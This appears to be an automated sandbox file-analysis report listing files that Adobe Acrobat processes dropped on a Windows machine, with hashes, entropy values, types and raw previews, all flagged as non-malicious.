                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):71954
                                                          Entropy (8bit):7.996617769952133
                                                          Encrypted:true
                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                          Malicious:false
                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192
                                                          Entropy (8bit):2.7673182398396405
                                                          Encrypted:false
                                                          SSDEEP:3:kkFkl9xulfllXlE/HT8k6Slh1NNX8RolJuRdxLlGB9lQRYwpDdt:kK5mT8+z7NMa8RdWBwRd
                                                          MD5:8F59F32896187113F845401D3284CA3F
                                                          SHA1:E49E73EE9753E212AF20C8EC4C53570042D9AFEB
                                                          SHA-256:8B180FE89DC14100C73BA801047CD36B0A0AF56FECB3A1157A25091F0ED2E435
                                                          SHA-512:94A17B9F124EDA647F8BB33A9857084419ED8CBD8628362ADB22F4B62BEF3D7D5176337AB1B0CD8D491BC7737BCCBC7A93FD1DCAC779B67C7225CCDD5C69C3E7
                                                          Malicious:false
                                                          Preview:p...... .........K...D..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):328
                                                          Entropy (8bit):3.1379890379152853
                                                          Encrypted:false
                                                          SSDEEP:6:kK/5T9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:IDnLNkPlE99SNxAhUe/3
                                                          MD5:31D04001C32D0FB51C8C627D214BEB5F
                                                          SHA1:3E5C39D408D21483D87854C9AE6B9CB3C8DAC661
                                                          SHA-256:D2CDD6D41E805D00FEAD8521F74E2604FC0F017E5D49AC16EA447ABC96B36610
                                                          SHA-512:B5BE8683FCAB882380213EEA353F0C67C65075BD38764893BD42CA55A820BD665C06D10E87AC5527E3C237E3566409E791E1376790E291A2AD8354015D485F2A
                                                          Malicious:false
                                                          Preview:p...... .........j...D..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243196
                                                          Entropy (8bit):3.3450692389394283
                                                          Encrypted:false
                                                          SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                          MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                          SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                          SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                          SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                          Malicious:false
                                                          Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):0.8112781244591328
                                                          Encrypted:false
                                                          SSDEEP:3:e:e
                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                          Malicious:false
                                                          Preview:....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):2145
                                                          Entropy (8bit):5.066835114737891
                                                          Encrypted:false
                                                          SSDEEP:48:YYl2sL0/EY0bMSlMtCM5mMOpiMAW0MretMSMmkaMY:Dwv/SYtt55V6AWLre6JmkhY
                                                          MD5:A69CD42EC715364F5035390A7184731E
                                                          SHA1:C79803562D827A2EE59BB40AC255C90A81D704D5
                                                          SHA-256:14EC0E9DAA6EC92CDF0014AD9D6F23D4FFA007D33B343AB2C61B80242B465AFB
                                                          SHA-512:CDF23C8CF9B1A22101690E6BE04BA288992EA093EDA1E6025DEE6AF8F04DB135C5FF34937839B79622C39AE2D61699FE2428CD27F81C4A899C1EA2CD46B1E6A2
                                                          Malicious:false
                                                          Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733158507000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"7c2ad79e375e3ea39f82a389e8a5841f","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696420882000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):1.1880878101729135
                                                          Encrypted:false
                                                          SSDEEP:48:TGufl2GL7msEHUUUUUUUUbaHSvR9H9vxFGiDIAEkGVvpPan:lNVmswUUUUUUUUg+FGSIt+
                                                          MD5:334FC835FDD03171AF9553428A226BEA
                                                          SHA1:F93A38CACA9F73AAF240EAD0B5FCEA6AB0597BE9
                                                          SHA-256:F2010A512C4B8E9D6FDC8E24A68E991E9ECB0DE99AD7F74388040B12870CD400
                                                          SHA-512:4A0C58F0D92A5380B0BDFE939FA265D2D945BCF3530337E05C47436379ADDE8CF9FA429AD075A704FEF4170C2F41E3F50FAF6AF5B5BA1213AA0E25708FB9AB2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):1.6082980174887451
                                                          Encrypted:false
                                                          SSDEEP:48:7MeKUUUUUUUUUUbabvR9H9vxFGiDIAEkGVvqqFl2GL7ms6:7qUUUUUUUUUU+FGSIt8KVms6
                                                          MD5:786D332B8684F9015EA8364D4961B919
                                                          SHA1:941D813D492427EDBB61C104960C091F8E52588D
                                                          SHA-256:49E98385F516E0F1AC3BAED7AB9F9C2A583A044758200D7D7E69AA194858CD66
                                                          SHA-512:6CA2D9D6D4EC55088FF1C9CAC07849E63C39D5F7E7227C9B56B846364F16B0785B0030DBED8112DD72D1B6D973EB4B554E8881978A299AFDD261360AE232BBF7
                                                          Malicious:false
                                                          Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66726
                                                          Entropy (8bit):5.392739213842091
                                                          Encrypted:false
                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgvXQGCkWbjzEZxaC2kJVL1GiDYyu:6a6TZ44ADEvQGCkWwZD9DK
                                                          MD5:64686A828D908621C29B53DD5645D31C
                                                          SHA1:3AD5FD13A4B17F638620240494604F147FB39A71
                                                          SHA-256:C5E777297B5330A1E78BE2FEB3CB33CE2D08246CC9799785C60A95C2CD4BC9E0
                                                          SHA-512:0AADFCE0240608B4259A5B192ADA3D7C7E46970E2F06172EBF9AD654219BDAF3729253EF2B9C4FDE8F0C4794B2DB955A221ABDBF7066F672DB7019D75651F3D8
                                                          Malicious:false
                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):3.488233466829981
                                                          Encrypted:false
                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8gZa+nH:Qw946cPbiOxDlbYnuRKLN
                                                          MD5:70144CE84ADA344D56B93493B7817FA0
                                                          SHA1:0A4A78B46B77DBFDD789A42A3B7E3DCE656B9B35
                                                          SHA-256:753E7DCE43CBB11CB09DDB09269BA8E5A518DB2631B5B66B191F2DE8AC46ABCC
                                                          SHA-512:AACF8BFDAB52FB29FEFD55BAAE9AD1723CCDDBD2C4CBD21CB8C4D425FAB40AE2F1CFFC9B832C9A8A6AABB81755F65A8DF0B4A3B54DFCC5279A39F557D06415F0
                                                          Malicious:false
                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.2./.1.2./.2.0.2.4. . .1.1.:.5.5.:.1.1. .=.=.=.....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PDF document, version 1.6, 0 pages
                                                          Category:dropped
                                                          Size (bytes):358
                                                          Entropy (8bit):5.048041831646329
                                                          Encrypted:false
                                                          SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOh0IPC95IPCquLCSyAAO:IngVMre9T0HQIDmy9g06JXR0LnquLlX
                                                          MD5:A573831F53E03341181590910830732B
                                                          SHA1:02059C2BD6BABA86484AFF7E23EE68ADEB973811
                                                          SHA-256:86668CEF6729CF946D101329C35F1498CC311B8FD4716A8E68FB8501855D9F03
                                                          SHA-512:468DADAD4BC2A166D02E72B04DDEB651FA2551F81E92C893D5C45074BF3D16041B630ABD1B74FE20FDC3B8D6C274D5A5E98B04C6441CFDA93A71B0BC9A5CB5E4
                                                          Malicious:false
                                                          Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<3228C768B7E4534BA6E02DE09910C181><3228C768B7E4534BA6E02DE09910C181>]>>..startxref..127..%%EOF..
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393)
                                                          Category:dropped
                                                          Size (bytes):16525
                                                          Entropy (8bit):5.345946398610936
                                                          Encrypted:false
                                                          SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                          MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                          SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                          SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                          SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                          Malicious:false
                                                          Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):16603
                                                          Entropy (8bit):5.345002489844896
                                                          Encrypted:false
                                                          SSDEEP:384:u1DgrlKZ/STNi0wFIUgvT1CD/El1pMoxWVXVJNn73OL+tS0nCCaov0VWVMdwWaHC:o/7RYt
                                                          MD5:C917D6E15BA70E4C267848B05AE5408C
                                                          SHA1:A3BDB3BB28D10D3BDD1750FEA22AE4E8FB77476C
                                                          SHA-256:51ECC5B7E8568C4E9138D3474EF0A0071A27FF4BAA058CE4A3B9D5F8EFBEBFE1
                                                          SHA-512:EC6779FE4B48D291A9BA95B2D16E0CB440E1515BB24C0E4A942B22D0326AB856317DE84F405A77AA7C80F8527BB42B18A8A1B9E4B46ED69422D1EAA0D89710D8
                                                          Malicious:false
                                                          Preview:SessionID=f475df16-835d-4a03-97e1-23e7edd70646.1733158506379 Timestamp=2024-12-02T11:55:06:379-0500 ThreadID=7928 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f475df16-835d-4a03-97e1-23e7edd70646.1733158506379 Timestamp=2024-12-02T11:55:06:380-0500 ThreadID=7928 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f475df16-835d-4a03-97e1-23e7edd70646.1733158506379 Timestamp=2024-12-02T11:55:06:380-0500 ThreadID=7928 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f475df16-835d-4a03-97e1-23e7edd70646.1733158506379 Timestamp=2024-12-02T11:55:06:380-0500 ThreadID=7928 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f475df16-835d-4a03-97e1-23e7edd70646.1733158506379 Timestamp=2024-12-02T11:55:06:380-0500 ThreadID=7928 Component=ngl-lib_NglAppLib Description="SetConf
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):29752
                                                          Entropy (8bit):5.389852589970325
                                                          Encrypted:false
                                                          SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r+:y
                                                          MD5:5CEC48FF3726AE49E3636ECF064AC607
                                                          SHA1:8F4B8C7086B1C5C8EA8B39DA3E465350070D94F0
                                                          SHA-256:DAE086B33C660BBA0A549F506EC4AB98DD46A49555DA9B2961223946487F1B2F
                                                          SHA-512:C7B51FD78A256C965616F6610ED83DF83C6B460A6265995BAB08CBF65D65E60C78ADDD2BBB5C03A912068540E8C740ECE8869FDA4CA431577365731925F8A1B4
                                                          Malicious:false
                                                          Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                          Category:dropped
                                                          Size (bytes):1419751
                                                          Entropy (8bit):7.976496077007677
                                                          Encrypted:false
                                                          SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                          MD5:95F182500FC92778102336D2D5AADCC8
                                                          SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                          SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                          SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                          Malicious:false
                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                          Category:dropped
                                                          Size (bytes):758601
                                                          Entropy (8bit):7.98639316555857
                                                          Encrypted:false
                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                          MD5:3A49135134665364308390AC398006F1
                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                          Malicious:false
                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                          Category:dropped
                                                          Size (bytes):386528
                                                          Entropy (8bit):7.9736851559892425
                                                          Encrypted:false
                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                          Malicious:false
                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
